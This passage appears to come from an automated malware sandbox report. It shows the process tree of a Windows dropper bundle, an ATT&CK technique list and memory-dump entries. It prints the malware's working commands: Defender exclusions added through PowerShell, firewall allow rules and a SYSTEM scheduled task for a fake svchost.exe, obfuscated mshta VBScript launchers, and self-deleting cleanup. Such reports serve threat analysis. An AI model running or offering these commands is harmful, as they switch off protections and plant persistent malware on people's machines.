        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eChO "
        7⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
        7⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec /y ..\_enU.W
        7⤵
        
        PID:8012
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f -IM "Wed090db89ca4c58.exe"
      4⤵
      Kills process with taskkill
      PID:4884

C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09f69eef9c0d5b.exe
Wed09f69eef9c0d5b.exe
1⤵
- Executes dropped EXE
PID:2428
- C:\Users\Admin\AppData\Local\Temp\is-7OJC6.tmp\Wed09f69eef9c0d5b.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-7OJC6.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$401D2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09f69eef9c0d5b.exe"
  2⤵
  PID:1440
- - C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09f69eef9c0d5b.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09f69eef9c0d5b.exe" /SILENT
    3⤵
    - Executes dropped EXE
    PID:3080
  - - C:\Users\Admin\AppData\Local\Temp\is-A5VD6.tmp\Wed09f69eef9c0d5b.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-A5VD6.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$201E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09f69eef9c0d5b.exe" /SILENT
      4⤵
      Executes dropped EXE
      PID:3236

C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed0968d19e5ec37794.exe
Wed0968d19e5ec37794.exe
1⤵
- Executes dropped EXE
PID:1976
- C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed0968d19e5ec37794.exe
  C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed0968d19e5ec37794.exe
  2⤵
  PID:2240

C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09fbe3bf81.exe
Wed09fbe3bf81.exe
1⤵
- Executes dropped EXE
PID:2288
- C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09fbe3bf81.exe
  C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09fbe3bf81.exe
  2⤵
  PID:3692

C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed09d761ab4704dd931.exe
Wed09d761ab4704dd931.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed0944361c3621a67a6.exe
Wed0944361c3621a67a6.exe
1⤵
- Executes dropped EXE
PID:1724

C:\Users\Admin\AppData\Local\Temp\7zS47476126\Wed0900caa0501dc98f.exe
Wed0900caa0501dc98f.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3756
- C:\Users\Admin\Pictures\Adobe Films\dwuOSRZcyv1Qz3vrC7nMfiUf.exe
  "C:\Users\Admin\Pictures\Adobe Films\dwuOSRZcyv1Qz3vrC7nMfiUf.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1440
- C:\Users\Admin\Pictures\Adobe Films\OEso9hymrTfz2l5yYRF04p5O.exe
  "C:\Users\Admin\Pictures\Adobe Films\OEso9hymrTfz2l5yYRF04p5O.exe"
  2⤵
  PID:4768
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 400
    3⤵
    - Program crash
    PID:3228
- C:\Users\Admin\Pictures\Adobe Films\B9nDw8IDFSTbN3ijJqV7AFEo.exe
  "C:\Users\Admin\Pictures\Adobe Films\B9nDw8IDFSTbN3ijJqV7AFEo.exe"
  2⤵
  PID:4456
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 476
    3⤵
    - Program crash
    PID:2560
- C:\Users\Admin\Pictures\Adobe Films\O7CmW67YfpiTL5AR2BscLva6.exe
  "C:\Users\Admin\Pictures\Adobe Films\O7CmW67YfpiTL5AR2BscLva6.exe"
  2⤵
  PID:312
- - C:\Users\Admin\Pictures\Adobe Films\O7CmW67YfpiTL5AR2BscLva6.exe
    "C:\Users\Admin\Pictures\Adobe Films\O7CmW67YfpiTL5AR2BscLva6.exe"
    3⤵
    PID:5924
- C:\Users\Admin\Pictures\Adobe Films\hoKSLCbYh7YHk2h8M_omYIZa.exe
  "C:\Users\Admin\Pictures\Adobe Films\hoKSLCbYh7YHk2h8M_omYIZa.exe"
  2⤵
  PID:3188
- C:\Users\Admin\Pictures\Adobe Films\iN6nvskGoPe05hLyclbcA1CD.exe
  "C:\Users\Admin\Pictures\Adobe Films\iN6nvskGoPe05hLyclbcA1CD.exe"
  2⤵
  PID:5128
- C:\Users\Admin\Pictures\Adobe Films\kRz97dLeujvs7KnxkHKvmnNx.exe
  "C:\Users\Admin\Pictures\Adobe Films\kRz97dLeujvs7KnxkHKvmnNx.exe"
  2⤵
  PID:5252
- - C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe
    C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe
    3⤵
    PID:5680
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:5472
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 556
      4⤵
      Program crash
      PID:5336
- - C:\Users\Admin\AppData\Roaming\Underdress.exe
    C:\Users\Admin\AppData\Roaming\Underdress.exe
    3⤵
    PID:5716
  - - C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe
      "C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"
      4⤵
      PID:5856
- C:\Users\Admin\Pictures\Adobe Films\qJwt0q3C1cMi4KgO_wWxWwIg.exe
  "C:\Users\Admin\Pictures\Adobe Films\qJwt0q3C1cMi4KgO_wWxWwIg.exe"
  2⤵
  PID:5244
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\qJwt0q3C1cMi4KgO_wWxWwIg.exe" & exit
    3⤵
    PID:2400
- C:\Users\Admin\Pictures\Adobe Films\6g4lDU0pI_r3sFcMg3rVBvOn.exe
  "C:\Users\Admin\Pictures\Adobe Films\6g4lDU0pI_r3sFcMg3rVBvOn.exe"
  2⤵
  PID:5236
- C:\Users\Admin\Pictures\Adobe Films\SMyjFU4LcuQ0VZT4pVXqo6QL.exe
  "C:\Users\Admin\Pictures\Adobe Films\SMyjFU4LcuQ0VZT4pVXqo6QL.exe"
  2⤵
  PID:5212
- C:\Users\Admin\Pictures\Adobe Films\CZij_JskbeFnwgtxtd0WlR7n.exe
  "C:\Users\Admin\Pictures\Adobe Films\CZij_JskbeFnwgtxtd0WlR7n.exe"
  2⤵
  PID:5164
- C:\Users\Admin\Pictures\Adobe Films\lM6mf17I5tfTcuTcdDwTq0V3.exe
  "C:\Users\Admin\Pictures\Adobe Films\lM6mf17I5tfTcuTcdDwTq0V3.exe"
  2⤵
  PID:5156
- C:\Users\Admin\Pictures\Adobe Films\ceh82PkuwWPBRmIF4zunICLN.exe
  "C:\Users\Admin\Pictures\Adobe Films\ceh82PkuwWPBRmIF4zunICLN.exe"
  2⤵
  PID:4936
- C:\Users\Admin\Pictures\Adobe Films\ckgWSzsrtdERaUyRuPER7NhA.exe
  "C:\Users\Admin\Pictures\Adobe Films\ckgWSzsrtdERaUyRuPER7NhA.exe"
  2⤵
  PID:2112
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ckgWSzsrtdERaUyRuPER7NhA.exe" & exit
    3⤵
    PID:5588
- C:\Users\Admin\Pictures\Adobe Films\NhhwactwkJcFIRfwSvGVMm1W.exe
  "C:\Users\Admin\Pictures\Adobe Films\NhhwactwkJcFIRfwSvGVMm1W.exe"
  2⤵
  PID:4816
- C:\Users\Admin\Pictures\Adobe Films\hyHBDI0nYu2ZH5CmzNrcsT8u.exe
  "C:\Users\Admin\Pictures\Adobe Films\hyHBDI0nYu2ZH5CmzNrcsT8u.exe"
  2⤵
  PID:4996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
    3⤵
    PID:1388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
    3⤵
    PID:2124
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
    3⤵
    - Creates scheduled task(s)
    PID:6232
- - C:\Windows\System\svchost.exe
    "C:\Windows\System\svchost.exe" formal
    3⤵
    PID:6336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
      4⤵
      PID:6132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
      4⤵
      PID:6876
  - - C:\Windows\System32\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
      4⤵
      PID:6148
  - - C:\Windows\System32\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
      4⤵
      PID:6904
- - C:\Windows\System32\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
    3⤵
    PID:6216
- - C:\Windows\System32\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
    3⤵
    PID:4488
- C:\Users\Admin\Pictures\Adobe Films\oax2ezsclPT0XEsM41qWxv5a.exe
  "C:\Users\Admin\Pictures\Adobe Films\oax2ezsclPT0XEsM41qWxv5a.exe"
  2⤵
  PID:3708
- - C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
    "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
    3⤵
    PID:3156
- - C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe
    "C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"
    3⤵
    PID:4932
- - C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe
    "C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"
    3⤵
    PID:1968
- - C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
    "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
    3⤵
    PID:6092
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
      4⤵
      PID:4300
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
        5⤵
        
        PID:6488
      - C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        6⤵
        
        PID:5316
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        7⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        8⤵
        
        PID:7500
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "search_hyperfs_206.exe"
        6⤵
        Kills process with taskkill
        
        PID:7544
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    PID:1216
  - - C:\Users\Admin\AppData\Local\Temp\is-AMQLM.tmp\setup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-AMQLM.tmp\setup.tmp" /SL5="$3038E,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
      4⤵
      PID:5592
    - - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        5⤵
        
        PID:6156
      - C:\Users\Admin\AppData\Local\Temp\is-KKIGV.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KKIGV.tmp\setup.tmp" /SL5="$8003A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        6⤵
        
        PID:6516
        
        C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
        
        "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
        7⤵
        
        PID:7136
        
        C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
        
        "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
        7⤵
        
        PID:5176
        
        C:\be3a51debdbe00162eb74b1d483a91\Setup.exe
        
        C:\be3a51debdbe00162eb74b1d483a91\\Setup.exe /q /norestart /x86 /x64 /web
        8⤵
        
        PID:7512
        
        C:\Users\Admin\AppData\Local\Temp\is-F6907.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-F6907.tmp\postback.exe" ss1
        7⤵
        
        PID:6272
- - C:\Users\Admin\AppData\Local\Temp\inst1.exe
    "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
    3⤵
    PID:3928
- - C:\Users\Admin\AppData\Local\Temp\askinstall25.exe
    "C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"
    3⤵
    PID:5568
- - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    PID:3788
- - C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
    "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
    3⤵
    PID:6224
- - C:\Users\Admin\AppData\Local\Temp\chrome1.exe
    "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
    3⤵
    PID:6436
- - C:\Users\Admin\AppData\Local\Temp\chrome update.exe
    "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
    3⤵
    PID:6676
- - C:\Users\Admin\AppData\Local\Temp\chrome2.exe
    "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
    3⤵
    PID:6852
- C:\Users\Admin\Pictures\Adobe Films\NNhGkwus4qKik58esshU8x2t.exe
  "C:\Users\Admin\Pictures\Adobe Films\NNhGkwus4qKik58esshU8x2t.exe"
  2⤵
  PID:4652
- C:\Users\Admin\Pictures\Adobe Films\2JEn2UqB8LxBXqraL0UWvG4o.exe
  "C:\Users\Admin\Pictures\Adobe Films\2JEn2UqB8LxBXqraL0UWvG4o.exe"
  2⤵
  PID:1076
- - C:\Users\Admin\Pictures\Adobe Films\2JEn2UqB8LxBXqraL0UWvG4o.exe
    "C:\Users\Admin\Pictures\Adobe Films\2JEn2UqB8LxBXqraL0UWvG4o.exe"
    3⤵
    PID:4700
- C:\Users\Admin\Pictures\Adobe Films\QTq74fsbSDOtsx9oj_kojSl7.exe
  "C:\Users\Admin\Pictures\Adobe Films\QTq74fsbSDOtsx9oj_kojSl7.exe"
  2⤵
  PID:3016
- C:\Users\Admin\Pictures\Adobe Films\DfGJjcbzdnSfcvWH5NRhgySK.exe
  "C:\Users\Admin\Pictures\Adobe Films\DfGJjcbzdnSfcvWH5NRhgySK.exe"
  2⤵
  PID:3176
- C:\Users\Admin\Pictures\Adobe Films\BkfL8QvTIcwlDLuwrkYZhhkO.exe
  "C:\Users\Admin\Pictures\Adobe Films\BkfL8QvTIcwlDLuwrkYZhhkO.exe"
  2⤵
  PID:720
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    PID:1308
- C:\Users\Admin\Pictures\Adobe Films\Sg4hzeUnfv3kjD1hNASQgGHU.exe
  "C:\Users\Admin\Pictures\Adobe Films\Sg4hzeUnfv3kjD1hNASQgGHU.exe"
  2⤵
  PID:1864
- C:\Users\Admin\Pictures\Adobe Films\4hPINCs26UMvICdUUFX51Kau.exe
  "C:\Users\Admin\Pictures\Adobe Films\4hPINCs26UMvICdUUFX51Kau.exe"
  2⤵
  PID:4508
- C:\Users\Admin\Pictures\Adobe Films\ATeYGr1Ao1prRb5XCtQQOSJB.exe
  "C:\Users\Admin\Pictures\Adobe Films\ATeYGr1Ao1prRb5XCtQQOSJB.exe"
  2⤵
  PID:2348
- C:\Users\Admin\Pictures\Adobe Films\_MwdWTzvI2qO3BivR3EHfWuE.exe
  "C:\Users\Admin\Pictures\Adobe Films\_MwdWTzvI2qO3BivR3EHfWuE.exe"
  2⤵
  PID:6100
- - C:\Users\Admin\Pictures\Adobe Films\_MwdWTzvI2qO3BivR3EHfWuE.exe
    "C:\Users\Admin\Pictures\Adobe Films\_MwdWTzvI2qO3BivR3EHfWuE.exe"
    3⤵
    PID:3348
- C:\Users\Admin\Pictures\Adobe Films\uZQtzmbI94W8AL0P9DhfOGCv.exe
  "C:\Users\Admin\Pictures\Adobe Films\uZQtzmbI94W8AL0P9DhfOGCv.exe"
  2⤵
  PID:6376
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\uZQtzmbI94W8AL0P9DhfOGCv.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\uZQtzmbI94W8AL0P9DhfOGCv.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
    3⤵
    PID:6200
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\uZQtzmbI94W8AL0P9DhfOGCv.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\uZQtzmbI94W8AL0P9DhfOGCv.exe" ) do taskkill -im "%~NxK" -F
      4⤵
      PID:5804
    - - C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
        
        8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
        5⤵
        
        PID:7556
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        6⤵
        
        PID:7700
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
        7⤵
        
        PID:7884
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -im "uZQtzmbI94W8AL0P9DhfOGCv.exe" -F
        5⤵
        Kills process with taskkill
        
        PID:8100
- C:\Users\Admin\Pictures\Adobe Films\Gce3CCWpBuXx3Zn5lmZ9CuRm.exe
  "C:\Users\Admin\Pictures\Adobe Films\Gce3CCWpBuXx3Zn5lmZ9CuRm.exe"
  2⤵
  PID:7036

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4300
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4544

C:\Windows\SysWOW64\cmstp.exe
"C:\Windows\SysWOW64\cmstp.exe"
1⤵
PID:3956
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Pictures\Adobe Films\Kxht0cL5u2MCpCS4vcVxg2G3.exe"
  2⤵
  PID:5608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 312
1⤵
- Program crash
PID:5528

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/60-211-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/60-454-0x0000000000400000-0x00000000004D9000-memory.dmp

Filesize
868KB

Download
memory/60-227-0x0000000000400000-0x0000000002DAA000-memory.dmp

Filesize
41.7MB

Download
memory/456-459-0x0000026C4DE60000-0x0000026C4DED2000-memory.dmp

Filesize
456KB

Download
memory/456-360-0x0000026C4DD40000-0x0000026C4DDB2000-memory.dmp

Filesize
456KB

Download
memory/696-266-0x0000000007560000-0x0000000007561000-memory.dmp

Filesize
4KB

Download
memory/696-496-0x000000007E1B0000-0x000000007E1B1000-memory.dmp

Filesize
4KB

Download
memory/696-259-0x0000000006C20000-0x0000000006C21000-memory.dmp

Filesize
4KB

Download
memory/696-209-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/696-206-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/696-273-0x0000000007750000-0x0000000007751000-memory.dmp

Filesize
4KB

Download
memory/696-239-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

Filesize
4KB

Download
memory/696-262-0x0000000006CC0000-0x0000000006CC1000-memory.dmp

Filesize
4KB

Download
memory/696-282-0x00000000073C0000-0x00000000073C1000-memory.dmp

Filesize
4KB

Download
memory/696-236-0x0000000000ED2000-0x0000000000ED3000-memory.dmp

Filesize
4KB

Download
memory/696-233-0x0000000006D50000-0x0000000006D51000-memory.dmp

Filesize
4KB

Download
memory/860-221-0x00000000002D0000-0x00000000002D1000-memory.dmp

Filesize
4KB

Download
memory/860-241-0x0000000004B10000-0x0000000004B11000-memory.dmp

Filesize
4KB

Download
memory/860-257-0x0000000004C60000-0x0000000004C61000-memory.dmp

Filesize
4KB

Download
memory/860-260-0x0000000005170000-0x0000000005171000-memory.dmp

Filesize
4KB

Download
memory/1008-365-0x0000000005540000-0x0000000005B46000-memory.dmp

Filesize
6.0MB

Download
memory/1008-305-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1060-399-0x0000028402A70000-0x0000028402AE2000-memory.dmp

Filesize
456KB

Download
memory/1124-491-0x000001B6363E0000-0x000001B636452000-memory.dmp

Filesize
456KB

Download
memory/1124-385-0x000001B635C40000-0x000001B635CB2000-memory.dmp

Filesize
456KB

Download
memory/1260-472-0x000002D21E770000-0x000002D21E7E2000-memory.dmp

Filesize
456KB

Download
memory/1440-231-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1452-424-0x000001F02C840000-0x000001F02C8B2000-memory.dmp

Filesize
456KB

Download
memory/1532-205-0x0000000003200000-0x0000000003201000-memory.dmp

Filesize
4KB

Download
memory/1532-279-0x0000000007DA0000-0x0000000007DA1000-memory.dmp

Filesize
4KB

Download
memory/1532-237-0x0000000006FE2000-0x0000000006FE3000-memory.dmp

Filesize
4KB

Download
memory/1532-223-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

Filesize
4KB

Download
memory/1532-238-0x0000000006FE0000-0x0000000006FE1000-memory.dmp

Filesize
4KB

Download
memory/1532-210-0x0000000003200000-0x0000000003201000-memory.dmp

Filesize
4KB

Download
memory/1856-148-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1856-143-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1856-137-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1856-138-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1856-139-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1856-145-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1856-141-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1856-144-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1856-147-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1856-142-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1856-140-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1856-146-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1900-475-0x0000000002840000-0x0000000002841000-memory.dmp

Filesize
4KB

Download
memory/1932-448-0x0000017915EA0000-0x0000017915F12000-memory.dmp

Filesize
456KB

Download
memory/1976-220-0x0000000000510000-0x0000000000511000-memory.dmp

Filesize
4KB

Download
memory/1976-254-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

Filesize
4KB

Download
memory/1976-251-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

Filesize
4KB

Download
memory/2128-245-0x0000000006370000-0x00000000064BC000-memory.dmp

Filesize
1.3MB

Download
memory/2240-343-0x0000000004DE0000-0x00000000053E6000-memory.dmp

Filesize
6.0MB

Download
memory/2240-302-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2288-258-0x0000000004D80000-0x0000000004DF6000-memory.dmp

Filesize
472KB

Download
memory/2288-222-0x00000000005C0000-0x00000000005C1000-memory.dmp

Filesize
4KB

Download
memory/2428-213-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2568-419-0x0000000006980000-0x0000000006B1F000-memory.dmp

Filesize
1.6MB

Download
memory/2568-278-0x0000000001130000-0x0000000001146000-memory.dmp

Filesize
88KB

Download
memory/2624-481-0x00000288A2D30000-0x00000288A2DA2000-memory.dmp

Filesize
456KB

Download
memory/2624-367-0x00000288A2CB0000-0x00000288A2D22000-memory.dmp

Filesize
456KB

Download
memory/2648-355-0x0000018380E40000-0x0000018380EB2000-memory.dmp

Filesize
456KB

Download
memory/2648-469-0x0000018380F30000-0x0000018380FA2000-memory.dmp

Filesize
456KB

Download
memory/2816-340-0x000001EC81380000-0x000001EC813F2000-memory.dmp

Filesize
456KB

Download
